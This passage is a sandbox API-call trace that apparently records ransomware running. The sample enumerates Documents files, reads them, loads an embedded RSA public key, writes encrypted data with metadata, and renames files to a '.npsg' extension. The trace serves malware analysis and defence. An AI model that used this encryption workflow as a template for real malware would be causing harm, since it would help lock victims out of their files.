lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.708] GetCurrentThreadId () returned 0x5b4 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79228 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.709] GetCurrentThreadId () returned 0x5b4 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002c0 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002d8 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002a8 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400338 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400308 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400350 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002f0 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002c0 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002d8 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002a8 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400290 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b956f8 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.713] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x11d7a, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x11d7a, lpOverlapped=0x0) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.713] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x11d7f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.713] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.714] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.714] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.714] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.714] CloseHandle (hObject=0x644) returned 1 [0236.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.715] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j2nriryO.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j2nriryo.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j2nriryO.ppt.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j2nriryo.ppt.npsg")) returned 1 [0236.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.716] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.718] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcff48890, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x18912570, ftLastAccessTime.dwHighDateTime=0x1d5bef8, ftLastWriteTime.dwLowDateTime=0x18912570, ftLastWriteTime.dwHighDateTime=0x1d5bef8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ji_heo", cAlternateFileName="")) returned 1 [0236.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c968 [0236.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0236.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c968 | out: hHeap=0x620000) returned 1 [0236.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.718] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3086d340, ftCreationTime.dwHighDateTime=0x1d5bf0d, ftLastAccessTime.dwLowDateTime=0x191a07e0, ftLastAccessTime.dwHighDateTime=0x1d59f64, ftLastWriteTime.dwLowDateTime=0x191a07e0, ftLastWriteTime.dwHighDateTime=0x1d59f64, nFileSizeHigh=0x0, nFileSizeLow=0x14f8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k5oSr-PB.pptx", cAlternateFileName="K5OSR-~1.PPT")) returned 1 [0236.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.718] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k5oSr-PB.pptx") returned=".pptx" [0236.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k5oSr-PB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k5osr-pb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.718] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=85902) returned 1 [0236.719] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.721] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14f68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.721] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.723] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.723] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x14f8e, lpOverlapped=0x0) returned 1 [0236.724] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.724] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.724] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.724] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.725] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.725] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.725] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.725] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.725] GetLastError () returned 0x0 [0236.725] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.725] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.726] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.726] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.726] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14f90) returned 0x3b95d50 [0236.726] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b956f8 [0236.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400290 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95740 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002a8 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002d8 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.727] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002d8 | out: hHeap=0x620000) returned 1 [0236.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.727] RtlAllocateHeap (HeapHandle=0x620000, 